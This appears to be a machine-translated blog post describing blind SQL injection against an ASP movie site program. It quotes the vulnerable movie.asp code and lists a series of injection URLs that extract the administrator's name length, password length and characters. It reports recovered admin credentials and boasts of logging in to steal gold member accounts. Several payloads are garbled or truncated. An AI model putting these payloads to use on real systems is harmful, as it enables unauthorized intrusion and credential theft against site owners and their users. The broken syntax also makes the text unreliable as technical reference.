Simple intrusion into paid movie websites

Today, I am hanging out on the internet and found a good post about how to intrude into a free movie website. In fact, the program is easy to implement and is written in ASP, I believe that anyone who has learned the ASP program can understand it. The specific content is as follows:

Recently I learned SQL injection and downloaded a message from jinmei movie Program 2003 Member edition. I found a problem with the file movie. asp:
Dim SQL

Dim rs

ArticleID = request ("ID ")

Set rs = server. Createobject ("ADODB. recordset ")

SQL = "update learning set hits = hits + 1 where ArticleID =" & ArticleID

Rs. Open SQL, Conn, 1, 3

SQL = "select * from learning where ArticleID =" & ArticleID

Rs. Open SQL, Conn, 1, 1

Title = RS ("title ")

Ittype = RS ("typeid ")

Don't blame me for not checking the variables. Haha, I found a target website,

We started to test the number of digits of the administrator account. Because the field name for saving the Administrator account is name, the statement is:

Http://www.target.com/movie.asp? Id = 330 and 1 = (select ID from password where Len (name)> 4)

Normally return to the page, so we can know that the Administrator account is greater than 4!

We continue,

Http://www.target.com/movie.asp? Id = 330 and 1 = (select ID from password where Len (name)>

"The webpage cannot be displayed". An error occurred, so we can know that the Administrator's account is greater than or equal to 8 digits.

Let's come back,

Http://www.target.com/movie.asp? Id = 330 and 1 = (select ID from password where Len (name) = 8)

Returns the page normally.

Name is 8 bits

Similarly

Http://www.target.com/movie.asp? Id = 330 and 1 = (select ID from password where Len (PWD) = 21)

Normal Return page

PWD is 21-bit, tnnd, so long!

No, let's test the Administrator's username.

Http://www.target.com/movie.asp? Id = 320 and 1 = (select ID from password where ASC (mid (name,)> 50)

Normally, the page is not big enough.

Note: The mid function can divide the password into several parts and use the mid function (string, start bit, and length of the retrieved string)

Http://www.target.com/movie.asp? Id = 320 and 1 = (select ID from password where ASC (mid (name, 100)>)

"Page not displayed", it seems to be smaller than 100.

Http://www.target.com/movie.asp? Id = 320 and 1 = (select ID from password where ASC (mid (name, 100) =)

Return to the page normally, so we can get the first ASC code of the Administrator's username: 100

Query the ASC code table,

Name First: d

Next we will get name = darkeyes ^

Then we started to test PWD and shouted that there were 21 persons. It was a long journey! :)

Http://www.target.com/movie.asp? Id = 320 and 1 = (select ID from password where ASC (mid (PWD, 100)>)

The page is displayed normally.

Http://www.target.com/movie.asp? Id = 320 and 1 = (select ID from password where ASC (mid (PWD, 110)>)

"Page not displayed", smaller than 110, huh, huh

Http://www.target.com/movie.asp? Id = 320 and 1 = (select ID from password where ASC (mid (PWD, 102) =)

The page is displayed normally.

The first PWD is: F

Finally, we got it.

Pwd = xyfsdb7ew8y654233663d

Find the management page, log in, get the accounts of several gold members, and enjoy movies.